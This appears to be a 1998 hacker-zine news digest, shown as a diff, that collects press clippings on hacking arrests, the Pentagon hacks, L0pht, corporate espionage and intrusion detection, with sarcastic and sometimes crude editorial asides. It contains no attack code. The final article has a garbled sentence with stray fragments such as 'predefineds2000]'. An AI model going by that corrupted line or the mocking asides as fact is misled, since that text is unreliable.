+the respondents as a frequent point of attack, about the same percentage
+of respondents that cited internal systems as a frequent point of attack. 
+
+[snip...]
+
+What You Can Do
+
+One universal piece of advice came from hackers, hackers for hire and
+those who collect computer crime data: When your vendor issues a software
+patch, install it immediately. 
+
+"The biggest mistake people make is that they underestimate the threat," 
+Moss said. "They don't put in the patches, they misconfigure their
+firewalls, they misconfigure routers." 
+
+[snip...]
+
+0x8>-------------------------------------------------------------------------
+
+Title: Cyberattacks spur new warning system
+Author: Heather Harreld
+Date: March 23, 1998
+
+The Defense Department has created a new alert system to rate the level of
+threats to its information systems that mirrors the well-known Defense
+Conditions (DEFCONs) ratings that mark the overall military status in
+response to traditional foreign threats. 
+
+The new Information Conditions, or "INFOCONs," are raised and lowered
+based upon cyberthreats to DOD or to the U.S. Strategic Command (Stratcom)
+at Offutt Air Force Base in Nebraska. Stratcom is responsible for
+deterring any military attack on the United States and for deploying
+troops or launching nuclear weapons should deterrence fail, a Stratcom
+spokesman said. As INFOCONs are raised, officials take additional measures
+to protect information systems. 
+
+[snip...]
+
+Officials at Stratcom have developed detailed guidelines on raising and
+lowering INFOCONs based on the threat. Structured, systematic attacks to
+penetrate systems will result in a higher INFOCON level than when
+individual, isolated attempts are made, according to Stratcom. 
+
+[snip...]
+
+0x9>-------------------------------------------------------------------------
+
+Title: <pure lameness>
+Source: "Betty G.O'Hearn" <betty@infowar.com>
+
+Infowar.Com was notified today by the "Enforcers" Computer Hackers Group,
+that an agreement was reached with chief negotiator Ian A. Murphy, aka
+Capt. Zap, to cease and desist their cyber destruction witnessed in the
+recent attacks and intrusions that have rocked the Internet in past weeks. 
+The Enforcers began their massive assault on corporate and military
+websites after the arrest of "Pentagon Hackers" here in the US and Israel. 
+
+Ian Murphy, CEO of IAM/Secure Data Systems, and the first US hacker
+arrested back in 1981, issued press releases during negotiations. (see
+www.prnewswire.com) Murphy began the process to begin deliberations out of
+a sense of duty.  Murphy's dialogue with members of the Enforcer group
+pointed to the fact that the destruction was counter productive. He urged
+the group to consider halting this activity. "The destruction of
+information systems for an alleged cause is not the way to go about such
+things in defense of Hackers and Crackers." 
+
+[Who made Ian Murphy chief negotiator? Why wasn't I notified so I
+ could talk to these wankers? This is the kind of pathetic shit
+ that makes PRNewswire the pond scum of journalism. In case you couldn't
+ tell, this is pure media hype designed to get more business for
+ Murphy and CO.]
+
+[snip...]
+
+
+Statement from a Enforcers representative is below.
+
+[HTML tags have been removed.]
+
+From: Adam <<adamb1@flash.net>
+Reply-To: adamb1@flash.net
+Date: March 26, 1998
+Organization: Adam's Asylum
+To: "Betty G.O'Hearn" <<betty@infowar.com>
+Subject: Enforcers Press Release/Announcement
+
+STATEMENT OF THE ENFORCERS
+
+We, the Enforcers, have decided that it would be in the best interest of
+the hacking community and the security community at large to cease and
+desist all web site hacking of external businesses as advised by Mr. Ian
+Murphy (Captain Zap.) We agree that our actions are not productive and are
+doing more harm than good towards the security community.
+
+Therefore, as an agent of the Enforcers, I hereby state that all web site
+hacks on external sites will be immediately halted.  We feel that there
+will be other avenues opening to achieve our goal of a substantial
+reduction in child pornography and racist web sites and netizens. We also
+support the larger goals of the hacker community and in the future we will
+work to augment the public's view rather than detract from it. All members
+of Enforcers who hacked the web sites have agreed to this release and will
+stop hacking external web sites. 
+
+[13:51 GMT -0600 26 March 1998]
+
+We thank you for your time and assistance in this matter.
+
+We congratulate both Mr. Murphy and The Enforcers for their diligence in
+reaching this agreement. This is indeed an act of peace in our cyberworld.
+
+[This is indeed an act which causes illness to stomach.]
+
+0xa>-------------------------------------------------------------------------
+
+Title: IBM's Ethical Hackers Broke In!
+
+TUCSON, Ariz. (March 23, 1998 8:30 p.m.) - International Business Machines
+Corp.'s team of "ethical hackers" successfully broke into an unnamed
+company's computer network in a demonstration of a live attack at a
+computer industry conference. 
+
+[They make it sound like this is a big event. "Look guys! We
+ actually broke in!#$!"]
+
+[snip...]
+
+Palmer said IBM charges between $15,000 to $45,000 to perform a hack of a
+company's system, with its permission, to test its security. Palmer said
+because hacking is a felony, its clients sign a contract that he calls a
+"get out of jail free card" specifying what IBM is allowed to do. 
+
+The IBM team, which has an 80 percent success rate in electronic
+break-ins, is not a team of reformed hackers and Palmer warned the
+audience that hiring former hackers can be very dangerous, and not worth
+the risk. 
+
+[*BULLSHIT* .. IBM hires hackers.. IBM hires hackers.. secret is out,
+ nyah nyah.]
+
+[snip...]
+
+He said that there are currently about 100,000 hackers worldwide, but that
+about 9.99 percent of those hackers are potential professional hired
+hackers, who may be involved in corporate espionage, and .01 percent are
+world class cyber criminals. Ninety percent are amateurs who "cyber" 
+joyride." 
+
+[snip...]
+
+0xb>-------------------------------------------------------------------------
+
+Title: Two accused of conspiring to hack into CWRU system
+Source: Plain Dealer Reporter
+Author: Mark Rollenhagen
+Date: Thursday, March 26, 1998
+     
+A federal grand jury yesterday indicted two Cleveland Heights residents on
+felony computer hacking charges.
+     
+Rebecca L. Ching, 27, and Jason E. Demelo, 22, who authorities said live
+in an apartment on Mayfield Rd., are accused of conspiring to hack into
+the computer system at Case Western Reserve University between October
+1995 and June 1997. 
+     
+Ching was a systems administrator for a computer system on the CWRU campus
+network during at least a portion of the conspiracy, the indictment said.
+     
+She is accused of helping Demelo hack into the CWRU system by directing
+him to install a "sniffer" program capable of intercepting electronic
+information, including user names and passwords.
+     
+Federal prosecutors would not say why Ching and Demelo allegedly sought 
+to hack into the system.
+     
+Neither could be reached to comment.
+     
+Tom Shrout, director of communications for CWRU, said Ching worked part
+time for the university in its information sciences division three or four
+years ago. 
+     
+The case is believed to be the first federal computer hacking case brought
+in Northern Ohio since the FBI organized a computer crime unit last year. 
+     
+Demelo is also charged with seven counts of illegally intercepting
+electronic communications sent to other universities, including Cleveland
+State University, George Mason University and the University of Minnesota,
+and Internet providers, including Modern Exploration, APK Net Ltd., and
+New Age Consulting Service, and Cyber Access, a software company. 
+     
+0xc>-------------------------------------------------------------------------
+
+Title: FBI Warns of Big Increase In On-line Crime
+
+[Hrm.. wonder if it is time to get next year's budget?!]
+
+WASHINGTON (March 25, 1998 00:19 a.m. EST) -- Criminal cases against
+computer hackers have more than doubled this year as the ranks of teenage
+hackers were joined by industrial spies and foreign agents, the FBI warned
+Tuesday. 
+
+[Cases have doubled... no word on convictions.. hrm...]
+
+The FBI told a congressional Joint Economic Committee hearing that it had
+recorded a significant increase in its pending cases of computer
+intrusions, rising from 206 to 480 this year. 
+
+[snip...]
+
+Michael Vatis, head of the FBI's national infrastructure protection
+center, said: "Although we have not experienced the electronic equivalent
+of a Pearl Harbor or Oklahoma City, as some have foretold, the statistics
+and our cases demonstrate our dangerous vulnerabilities to cyber attacks." 
+
+[snip...]
+
+He told how one hacker had broken into telephone systems in Massachusetts
+to cut off communications at a regional airport and disconnect the control
+tower last year. Last week a teenager agreed to serve two years' probation
+after pleading guilty to disrupting communications at the Worcester,
+Mass., airport for six hours. 
+
+Another hacker in Florida is accused of breaking into the 911 emergency
+phone system last year and jamming all emergency services calls in the
+region. 
+
+The FBI said the dangers of cybercrime were rising because of the
+increased availability of hacking tools on the Internet, as well as
+electronic hardware such as radio frequency jamming equipment. 
+
+Last week Deputy Defense Secretary John Hamre toured European governments
+to warn of the risks of computer crime and discuss possible
+counter-measures. 
+
+In spite of the publicity surrounding hackers, industrial espionage
+remains the most costly source of cybercrime, the committee heard Tuesday. 
+
+Last July an unnamed computer communications company sent a malicious
+computer code which diverted communications from one of its rivals. The
+FBI estimated the victim company suffered losses of more than $1.5
+million. 
+
+Other FBI officials told how the U.S. was increasingly the subject of
+economic attack by foreign governments using computers. Larry Torrence, of
+the FBI's national security division, said foreign agents were
+"aggressively targeting" proprietary business information belonging to
+U.S. companies. 
+
+More frequently, criminals are using the Internet to defraud potential
+investors with bogus investment schemes and banks. 
+
+Fraudulent schemes on the Internet were becoming "epidemic," said Neil
+Gallagher, of the FBI's criminal division. One pyramid scheme, called
+Netware International, had recruited 2,500 members across the country by
+promising to share profits of 25 percent a year in a new bank which it was
+claiming to form. 
+
+Investigators said they had seized almost $1 million to date.
+
+0xd>-------------------------------------------------------------------------
+
+Title: Computer hacker jailed for 18 months
+Date: Friday, March 27, 1998
+     
+A computer hacker who tried to destroy an Internet company that refused to
+hire him was jailed for 18 months today for offences that include
+publishing customer credit card numbers. 
+     
+In the NSW District Court, Judge Cecily Backhouse said Skeeve Stevens
+seriously damaged AUSnet, which has since gone out of business, by
+compromising 1,225 credit cards and by prominently displaying a message on
+its homepage on the World Wide Web. 
+     
+The April 1995 message included: "So dont (sic) be surprised if all you
+(sic) cards have millions of dollars of shit on them ... AUSNET is a
+disgusting network ... and should be shut down and sued by all their
+users!" 
+     
+Stevens, 26, pleaded guilty to inserting data into a computer system in
+Sydney in April 1995 and asked the judge to take into account another
+eight offences, including accessing confidential information. 
+
+[snip...]
+
+The judge said Stevens' actions caused serious harm to the goodwill of
+AUSnet, whose staff had to answer non-stop calls from angry customers -
+many of whom cancelled their accounts - and who had to deal with crippling
+effects of their cash flows. 
+     
+Judge Backhouse said general deterrence was important in this type of
+offence, which was very hard to detect. 
+     
+She jailed him for three years, but ordered him to be released on a
+recognisance after 18 months. - Australian Associated Press *Australian
+Eastern Daylight Time (AEDT) is 11 hours ahead of Greenwich Mean Time. 
+     
+0xe>-------------------------------------------------------------------------
+
+Title: Afternoon Line
+Source: The Netly News
+Author: Declan McCullah
+Date: March 24, 1998
+
+Technology is one of those issues where lawmakers vie to sound as dumb as
+possible. At a "cyber-theft" hearing this morning, Rep. Jim Saxton
+(R-N.J.) said that his only knowledge about computers dates back to when
+his printer had a cover "to shield our ears from the noise."  Could the
+witnesses from the FBI please explain the problems they had with this
+newfangled Internet? Sure, replied Michael Vatis, the head of the National
+Infrastructure Protection Center: "There are hacker web sites" out there,
+he said, with software that lets you "click on a button to launch an
+attack." The fact that Carnegie Mellon University's CERT center reported a
+20 percent reduction in attacks from 1996 to 1997 didn't faze him. The
+real problem, Vatis griped, is "people out there who still romanticize
+hackers as kids just having fun. [What about] the elderly person who can't
+get through to 911 in an emergency because of a hacker?" Joining Vatis in
+testifying before Congress' Joint Economic Committee were top FBI honchos
+Larry Torrence and Neil Gallagher. Nobody representing civil liberties
+groups, computer security organizations, or high tech companies was
+invited to speak. --By Declan McCullagh/Washington
+
+[...]
+
+Witness at the Persecution
+
+Then again, there's a job opportunity in Los Angeles for someone with
+top-notch skills in telecommunications, system and network administration,
+and computer security -- and you won't even have to turn on a computer.
+The lawyer for renown hacker Kevin Mitnick is looking for an expert
+witness to testify at his client's trial, and has issued a sort of want-ad
+press release. "Qualified candidates must have an advanced degree and be
+knowledgeable in DOS, Windows, SunOS, VAX/VMS and Internet operations,"
+the job description reads. Oh well, they lost me after "qualified," but
+with Uncle Sam paying the tab it could be the perfect opportunity for
+someone with a taste for the spotlight and nothing on their agenda
+starting as early as March 30. 
+
+
+0xf>-------------------------------------------------------------------------
+
+Title: Hacking Geniuses or Monkeys
+Source: ZDTV
+Author: Ira Winkler
+Date: March 30, 1998
+
+By now everyone has heard about the Pentagon hacks-- and the ensuing
+arrests of two teenagers in Cloverdale, Calif., and The Analyzer, the
+Israeli claiming to be the superhacking mentor of the Cloverdale teens. 
+There were also two other Israelis arrested at the same time.
+
+The media and Websites like antionline.com portrayed the criminals as
+geniuses. I never heard of these supposed geniuses before, but the one
+thing that went through my mind was a quote by Scott Charney, Chief of the
+Department of Justice Computer Crime and Intellectual Property Unit: "Only
+the bad ones get caught."
+                  
+I wanted the inside scoop, so I talked to some real hackers, who are
+really considered "elite" within the hacking community. These are people
+who have been hacking for over a decade and can take control of any system
+that they want. They invent the hacks that the wannabes find tools to
+accomplish.
+
+The opinion of the elite varied little: "The hackers involved in the
+Pentagon and ensuing hacks are clueless."
+
+Bad hackers are clueless
+
+Why are the Pentagon hackers clueless? In the first place, they were
+caught. 
+
+The inside scoop is that the Pentagon hackers did nothing to cover their
+tracks and used the same routes of access again and again, making their
+capture inevitable. In short, they failed the basics of Criminal Hacking
+101.
+
+The true act of stupidity, however, was talking to the press and being
+totally unrepentant about their actions. They even bragged about it. This
+is like asking the FBI, "Please prosecute me."
+
+While the Department of Justice doesn't usually prosecute juveniles, the
+teenagers were almost daring them to. Then The Analyzer jumped in,
+threatening to wreak havoc on the entire Internet if the teenagers were
+pursued. A week later he was arrested.
+
+Skilled hackers remember the arrest of the people who hacked the DoJ and
+CIA webpages. The lesson: if you leave any tracks while embarrassing the
+US Government, you will be caught.
+
+The hacking inner circle told me that The Analyzer did not cover his
+tracks at all, and his capture was easy, even though it spanned
+international lines. And how skillful are The Analyzer and the Pentagon
+hackers? According to my sources, almost all the hacks were accomplished
+via a tool that automatically exploited the rstatd problem. 
+
+You really don't have to know what the rstatd problem means. The best
+analogy is that the Pentagon hackers found a master key on the street and
+tried it on every lock that they could find. Unfortunately, there are tens
+of thousands of "locks" that the master key fits. This is hardly the sign
+of a computer genius, according to the elite.
+
+Who is The Analyzer, anyway?
+
+The real hackers then wondered why they have never heard of The Analyzer
+before. The talented hackers do seem to know each other or at least hear
+about the "rising stars" of the community. The Analyzer never fit this
+category. Nor did anyone recognize him when his picture was wired around
+the world. 
+
+And what about the language that the Pentagon hackers and The Analyzer
+used in their unwise interviews? 
+
+The Analyzer threatened to damage "Internet servers." Apparently, real
+hackers don't use this term, it is too mainstream. The California
+teenagers were quoted as saying that the reason they hacked was, "Power." 
+Among the elite, real power is the anonymous and undetected control of a
+computer. Needless to say, the Pentagon hackers were not anonymous or
+undetected. I wonder how "powerful" they will feel in prison.
+
+It didn't surprise my hacker friends when another group of hackers,
+calling themselves The Enforcers, jumped on the bandwagon. These people
+threatened to hack computers all over the world in retaliation for the
+capture of The Analyzer and the Cloverdale teens. Of course, The
+Enforcers' self-proclaimed leader used the same email address to put out
+his statements and respond to queries from the media-- making himself and
+his group easy targets for federal attention. 
+
+The only reasons he may not be arrested is that his group hasn't caused
+any real damage, and the FBI has more important problems to deal with than
+wannabe hackers looking for their 15 minutes of fame. 
+
+Hacker wannabes
+
+I'm really getting sick of the Pentagon hacking stories, and all the
+wannabe hackers clamoring for their moment in the spotlight. Perhaps, when
+the FBI starts actively prosecuting juveniles and other people for
+hacking-related crimes, these wannabes will start using their computers in
+more productive ways.
+
+More importantly, maybe the media will stop portraying anyone who can hack
+a computer as some sort of genius. As I have said before, and as the real
+hackers can confirm, I can train a monkey to break into a computer in a
+few hours. The Pentagon hackers have displayed no more talents than the
+monkeys of which I speak. On the other hand, the fact that they can break
+into Pentagon computers makes the Department of Defense look like monkeys
+as well.
+
+The fact that the media continues to paint these wannabes as geniuses
+makes them worse than monkeys. 
+
+0x10>-------------------------------------------------------------------------
+
+Title: Low Tech Spooks - Corporate Spies
+Source: Forbes
+Author: Adam L. Penenberg
+
+In his slightly crumpled brown uniform, Richard Jones looked like any
+typical deliveryman, bringing in a new batch of urgently needed office
+supplies to corporations everywhere. But Jones, who was heading for the
+parking lot of a major chipmaker's border town maquiladora, only looked
+the part.  Everything about him that day was made up. 
+
+His uniform, "A close match, but not perfect," he would recall later, the
+office supplies--paper, pens and toner cartridges--picked up from a local
+stationery store. Even his name was fictional.
+
+As Jones took a final deep breath and carried the supplies into the
+company's air-conditioned chill, a security guard took one look at the
+brown uniform and lazily waved him through to the office manager's office. 
+Jones had already contacted the delivery company and, pretending to be
+from the semiconductor company, had canceled that week's delivery run.
+
+[snip...]
+
+And that was that. The office manager showed Jones around the entire
+premises, pointing out photocopiers, fax machines, bookshelves, supply
+cabinets that had to be resupplied and the offices of executives. She even
+got him coffee.
+
+What was the point of the charade? Jones, not his real name, is a
+corporate spook. A rival company had paid him to obtain the semiconductor
+company's forthcoming quarterly earnings before they were announced. The
+fee: a nifty $35,000. 
+
+[snip...]
+
+Many former Central Intelligence Agency, National Security Agency and
+Defense Intelligence Agency employees have sought refuge in the corporate
+world, often heading their own companies. They even have their own trade
+organization: the Society of Competitor Intelligence Professionals, or
+SCIPs. 
+
+[You must have proper ID and know the secret handshake to join.]
+
+"The scope of the problem is enormous," says Ira Winkler, security
+consultant and author of Corporate Espionage. "On any one day there are a
+few hundred people engaged in breaking into companies and stealing
+information in this country. I can literally walk into a company and
+within a few hours walk out with billions of dollars." 
+
+[One trick pony...]
+
+[snip...]
+
+0x11>------------------------------------------------------------------------
+
+Title: 'White Hat' Hackers Probe Pores in Computer Security Blankets
+Source: Washington Post
+Author: Pamela Ferdinand
+Date: April 4, 1998
+
+BOSTON: In a chaotic room crammed with computer terminals and circuit
+boards, a long-haired man in black jeans -- "Mudge" by his Internet handle
+-- fiddles with the knobs of a squawking radio receiver eavesdropping on
+the beeps and tones of data transmissions.
+
+Nearby, a baby-faced 22-year-old in a baggy sweat shirt, nicknamed
+"Kingpin," analyzes reams of coded equations to break password sequences
+percolating on his computer screen. Other figures with equally cryptic
+identities toil in an adjoining chamber, their concentrated faces lit only
+by a monitor's glare and the flicker of silent television sets.
+
+This is the L0pht, pronounced "loft," a techie operations center in a
+suburban warehouse several miles from city center that is inhabited by a
+group whose members have been called rock stars of the nation's
+computer-hacking elite.
+
+The seven members of this computer fraternity-cum-high tech clubhouse have
+defeated some of the world's toughest computer and telecommunications
+programs and created security software that is the gold standard of
+corporate and hacking worlds. By day, they are professional computer
+experts, mostly in their twenties and thirties, with jobs and even wives. 
+By night, they retreat to the warehouse and their electronic aliases troll
+the Internet for security gaps.
+
+Hacking mostly for the challenge, they have exposed security flaws in
+Microsoft Corp.'s leading network operating system, revealed holes in
+Lotus software and figured out how to decode pager messages and mobile
+police terminal data, among other feats.
+
+Hackers typically get into supposedly secure computer systems and pinpoint
+security breaches by deciphering elaborate number, letter and symbol
+combinations designed by manufacturers to protect their products. If
+security is breached, users risk having everything from private e-mail
+read to databases erased.
+
+A single, unintentional hack is not illegal, the U.S. attorney general's
+office here says. But repeat intruders face criminal penalties, especially
+when they compromise and damage confidential government, military or
+financial information. 
+
+[Hrm.. such nice vague wording. Break in one time (the first time),
+ and it isn't illegal?!]
+
+[snip...]
+
+L0pht members pride themselves on a less invasive and more altruistic goal
+just this side of the law:  To locate and document Internet security gaps
+for free for the sake of consumers who have been led to believe their
+online transactions are secure.
+
+"We think of our Net presence as a consumer watchdog group crossed with
+public television," said "Mudge," a professional cryptographer by day who
+declined to identify himself for security reasons.  "At this point, we're
+so high profile . . . it would be ludicrous for us to do anything wrong."
+
+Even companies whose products have been hacked for security weaknesses
+laud the social ethos and technical prowess of the members of the L0pht,
+who frequently notify manufacturers and recommend fixes before going
+public with their finds. Unlike villainous hackers labeled "black hats," 
+who probe cyberspace for profit and malice, Robin Hood-style "white hats" 
+like the L0pht are generally accorded respect, and even gratitude.
+
+[snip...]
+
+In the L0pht's most widely publicized hack, "Mudge" and a colleague
+assaulted Microsoft's Windows NT operating system last year and found
+inherent flaws in the algorithm and method designed to hide user
+passwords. They demonstrated the security breach by posting their
+victorious code on the Internet and showing how it was possible to steal
+an entire registry of passwords in roughly 26 hours, a task Microsoft
+reportedly claimed would take 5,000 years. 
+
+"It's big. It's bad. It cuts through NT passwords like a diamond tipped,
+steel blade," boasts advertising for the latest version of their
+security-auditing tool, dubbed "L0phtcrack." "It ferrets them out from the
+registry, from repair disks, and by sniffing the net like an anteater on
+dexadrene."
+
+Microsoft took notice and, in an unprecedented move, executives invited
+the L0pht to dinner at a Las Vegas hacker convention last year. They have
+worked with the L0pht to plug subsequent security loopholes while
+simultaneously adding hacker-style techniques to in-house testing.
+
+[snip...]
+
+In doing so, the L0pht is grabbing the world's attention. But for all
+their skill in unscrambling the great riddles of technology, they remain
+baffled by some fundamental mysteries of life. Asked what puzzle they
+would most like to solve, "Kingpin" replied: "Girls."
+
+[See! At least 2 out of 7 l0pht members hack for girls!]
+
+0x12>------------------------------------------------------------------------
+
+Title: 101 Ways to Hack into Windows NT
+Source: Surveillance List Forum
+Date: April 3, 1998
+
+MELBOURNE, AUSTRALIA: A study by Shake Communications Pty Ltd has
+identified not 101, but 104, vulnerabilities in Microsoft Windows NT,
+which hackers can use to penetrate an organisation's network. 
+
+Many of the holes are very serious, allowing intruders privileged access
+into an organisation's information system and giving them the ability to
+cause critical damage - such as copying, changing and deleting files, and
+crashing the network.  Most of the holes apply to all versions (3.5, 3.51
+and 4) of the popular operating system. 
+
+[snip...]
+
+Shake Communications also provides links to patches/fixes in its
+Vulnerabilities Database, which also covers other operating systems,
+programs, applications, languages and hardware. 
+
+[snip...]
+
+0x13>------------------------------------------------------------------------
+
+Title: Suspected NASA Hacker Nabbed
+Source: CNET news.com
+Date: April 6, 1998
+
+TORONTO, Ontario--A 22-year-old Canadian man suspected of breaking into a
+NASA Web site and causing tens of thousands of dollars in damage has been
+arrested by Canadian Mounties. 
+
+The Royal Canadian Mounted Police in the northern Ontario city of Sudbury
+charged Jason Mewhiney with mischief, illegal entry, and willfully
+obstructing, interrupting, and interfering with the lawful use of data,
+Corporal Alain Charbot said today. 
+
+[u4ea?!]
+
+[snip...]
+
+More than $70,000 worth of damage was caused at the NASA Web site and
+officials were forced to rebuild the site and change security, Charbot
+said. 
+
+The FBI tracked the hacker by tracing telephone numbers to the Sudbury
+area. 
+
+The Mounties raided the homes of Mewhiney's divorced parents and seized an
+ancient computer, a second basic computer, a high-speed modem, diskettes,
+and documents. 
+
+[snip...]
+
+Charbot said ironically, once hackers are released from police custody
+they are prime candidates for cushy corporate jobs, doing the same type of
+work--but with the permission of Web site builders. 
+
+[Why must these people revert to the use of 'web' terms?!]
+
+0x14>------------------------------------------------------------------------
+
+Title: CEOs Hear the Unpleasant Truth about Computer Security
+Source: CNN
+Author: Ann Kellan
+Date: April 6, 1998
+
+ATLANTA (CNN) -- Computer hackers breaking into government and corporate
+computers is estimated to be a $10 billion-a-year problem, so CEOs met
+Monday in Atlanta to hear what government and industry experts are doing
+about it. 
+
+[More expert figures on damage... <sigh>]
+
+They learned, among other things, that the Pentagon alone had 250,000
+hacker attempts on its computer system last year, and that computer
+networks are easy targets. 
+
+[And more quoting of inaccurate statistics...]
+
+They also learned that there are almost 2,000 Web sites offering tips,
+tools and techniques to hackers. 
+
+Among the things a hacker can do is send an e-mail to someone and attach a
+computer program to it. The attached program will, in the words of one
+hacker, "open up a back door" into the computer system it was sent to. 
+
+[Its just that easy I bet...]
+
+[snip...]
+
+According to IBM CEO Louis Gerstner, government and corporations need to
+work together to set standards for security practices such as
+hacker-resistant encryption codes. 
+
+"We should be encouraging the widespread adoption of encryption technology
+right now, led by U.S.-based manufacturers," Gerstner said. 
+
+CIA Director George Tenet told the CEOs not to look to the government to
+fix the problem. 
+
+[Now there is a good quote.]
+
+[snip...]
+
+0x15>------------------------------------------------------------------------
+
+Title: Codebreakers
+Source: Time Magazine
+Date: April 20, 1998
+	  
+CRACKED Thought your new digital cell phone was safe from high-tech
+thieves? Guess again. Silicon Valley cypherpunks have broken the
+proprietary encryption technology used in 80 million GSM (Global System
+for Mobile communications) phones nationwide, including Motorola MicroTAC,
+Ericsson GSM 900 and Siemens D1900 models. Now crooks scanning the
+airwaves can remotely tap into a call and duplicate the owner's digital
+ID. "We can clone the phones," brags Marc Briceno, who organized the
+cracking. His advice: manufacturers should stick to publicly vetted codes
+that a bunch of geeks can't crack in their spare time. --By Declan
+McCullagh/Washington
+
+0x16>------------------------------------------------------------------------
+
+Title: Hackers Could Disable Military
+Source: Washington Times
+Author: Bill Gertz
+Date: April 16, 1998
+
+Senior Pentagon leaders were stunned by a military exercise showing how
+easy it is for hackers to cripple U.S. military and civilian computer
+networks, according to new details of the secret exercise.
+
+Using software obtained easily from hacker sites on the Internet, a group
+of National Security Agency officials could have shut down the U.S. 
+electric-power grid within days and rendered impotent the
+command-and-control elements of the U.S. Pacific Command, said officials
+familiar with the war game, known as Eligible Receiver.
+
+[snip...]
+
+Pentagon spokesman Kenneth Bacon said, "Eligible Receiver was an important
+and revealing exercise that taught us that we must be better organized to
+deal with potential attacks against our computer systems and information
+infrastructure."
+
+[Such a neat name too!]
+
+The secret exercise began last June after months of preparation by the NSA
+computer specialists who, without warning, targeted computers used by U.S. 
+military forces in the Pacific and in the United States.
+
+The game was simple: Conduct information warfare attacks, or "infowar," on
+the Pacific Command and ultimately force the United States to soften its
+policies toward the crumbling communist regime in Pyongyang. The "hackers"
+posed as paid surrogates for North Korea. 
+
+The NSA "Red Team" of make-believe hackers showed how easy it is for
+foreign nations to wreak electronic havoc using computers, modems and
+software technology widely available on the darker regions of the
+Internet: network-scanning software, intrusion tools and password-breaking
+"log-in scripts." 
+
+[They successfully hack their target, yet they are "make-believe"?]
+
+According to U.S. officials who took part in the exercise, within days the
+team of 50 to 75 NSA officials had inflicted crippling damage. 
+
+They broke into computer networks and gained access to the systems that
+control the electrical power grid for the entire country. If they had
+wanted to, the hackers could have disabled the grid, leaving the United
+States in the dark. 
+
+[snip...]
+
+The attackers also foiled virtually all efforts to trace them.  FBI agents
+joined the Pentagon in trying to find the hackers, but for the most part
+they failed. Only one of the several NSA groups, a unit based in the
+United States, was uncovered. The rest operated without being located or
+identified.
+
+The attackers breached the Pentagon's unclassified global computer network
+using Internet service providers and dial-in connections that allowed them
+to hop around the world. 
+
+[snip...]
+
+The targets of the network attacks also made it easy. "They just were not
+security-aware," said the official. 
+
+A second official found that many military computers used the word
+"password" for their confidential access word. 
+
+[*scribbling notes..*]
+
+0x17>------------------------------------------------------------------------
+
+Title: Secret Service Hackers Can't Crack Internet
+Source: PA News
+Author: Giles Turnbull
+Date: April 21, 1998
+
+[So the NSA has better hackers than the Secret Service. <snicker>]
+
+   Professional computer hackers from the secret services were brought in
+to attempt to hack into the Government's internal secure communications
+system, which was launched today. 
+
+   As part of the year-long planning and preparation of the Intranet, staff
+from GCHQ and similar security organisations were brought in to try to hack
+into the system.
+
+   But they failed.
+
+[snip...]
+ 
+0x18>------------------------------------------------------------------------
+
+Title: Now Hiring: Hackers (Tattoos Welcome)
+Source: Tribune
+Author: Susan Moran
+Date: April 12, 1998
+
+Even the computer professionals who like to wear Birkenstocks and T-shirts
+to work find the dress code of GenX hackers a bit extreme. The main
+elements seem to be tattoos and nose rings. 
+
+[No stereotyping here...]
+
+They'd better get used to them. Many computer hackers, some of them
+recovering computer criminals, are adeptly turning their coveted expertise
+into big bucks.
+
+A surge in computer crime, spurred by the shift to networked computers and
+by the growing popularity of the Internet, has created a huge demand for
+information security experts who can help protect companies' computer
+systems. Recent high-profile attacks on government and university computer
+networks highlighted the vulnerability of these networks and spurred
+corporate executives to seek ways to fortify their systems.
+
+[snip...]
+
+In a separate recent incident, the Justice Department last month arrested
+three Israeli teenagers suspected of masterminding the break-ins of
+hundreds of military, government and university computer sites to gaze at
+unclassified information. The Federal Bureau of Investigation is also
+investigating two California teens who linked up with their Israeli
+co-conspirators over the Internet. 
+
+[Three Israeli teens? Gee, could they mean the two Cloverdale CALIFORNIA
+ kiddies and 'the analyzer'?]
+
+[snip...]
+
+Hackers' anarchistic style is gradually gaining acceptance in corporations
+and government agencies, although some conservative organizations feel
+safer renting experts from established consulting firms. 
+
+[Experts that consist of hackers who can dress well, and act all
+ 'corporate'.]
+
+[snip...]
+
+That yellow-haired hacker, a 24-year-old who prefers to be known by his
+alias, "Route," also sports a tongue bar. His work as an information
+security consultant is worth $1,500 to $2,000 a day to clients who want to
+arm themselves against attacks by "crackers"--the correct term for hackers
+who use their computer expertise to commit malicious acts of infiltrating
+computer networks. On his own time, Route edits Phrack, a computer
+security journal (phrack.com). And he occasionally gives talks to
+government and corporate clients for Villella's firm, New Dimensions
+International (www.ndi.com). Route writes his own security-related tools
+and claims he's never used them for illegal snooping.
+
+[Woohoo! Go Route! Go Route!]
+
+[snip...]
+
+Another hacker who now makes a healthy living consulting goes by the alias
+"Mudge." He is a member of L0pht, a sort of "hacker think tank" consisting
+of a handful of Boston-based hackers who work out of a loft space, where
+they research and develop products and swap information about computer and
+cellular phone security, among other things. Mudge consults for private
+and public organizations, teaches classes on secure coding practices, and
+writes his own and reviews others' code. "It pays well, but the money
+isn't the main reason I'm doing it," he said.
+
+[In a recent talk over beer, Mudge confided in me that he does it
+ for the girls. :) ]
+
+What he likes best is knowing he's among the elite experts who understand
+computer security more than big-name consultants. He's proud that he and
+his ragged assortment of hacker friends are called in to solve problems
+that stump the buttoned-down set.
+
+"Not bad for a bunch of bit-twiddlers," he wrote in an e-mail missive. 
+
+0x19>------------------------------------------------------------------------
+
+Title: Hacker Stoppers?
+Source: InformationWeek
+Author: Deborah Kerr
+Date: April 27
+
+Companies bought $65 million worth of network-intrusion
+tools last year, but capabilities still lag behind what's promised. 
+
+Neal Clift no longer sleeps on the floor of his office. Ten years ago, he
+slept under his Digital VAX at Leeds University in England, listening for
+the telltale clicks and hums that signal an intruder on his network. For
+weeks, a hacker had been shamelessly crashing his machine, deleting files,
+and reconfiguring controls. Clift tracked the hacker's movements, recorded
+the keystrokes, and eventually closed up the hacker's entry points.
+
+At the time, pulling late-nighters was the only way to catch a hacker,
+since poring over system logs could only establish the hacker's patterns
+after the fact. Now, intrusion-detection technology lets network security
+managers and administrators catch trespassers without spending the night
+on the office floor.
+
+Intrusion-detection tools are a $65 million industry that will grow as
+large as the firewall market, which reached about $255 million in 1997,
+according to the Hurwitz Group, in Framingham, Mass. Touted as network
+burglar alarms, intrusion-detection systems are programmed to watch for
+predefineds2000] attack "signatures," or predefined bytecode trails of
+prespecified hacks.  Intrusion-detection systems also send out real-time
+alerts of suspicious goings-on inside the network.  enger]
+
+But don't bet the server farm on intrusion-detection systems yet. They're
+still new, and their capabilities are limited. No matter what you buy,
+some portion of the enterprise will be unprotected. Intrusion-detection
+systems also can break down under certain types of attacks, in some cases
+even turning on their own networks under the guidance of a truly
+knowledgeable hacker. 
+
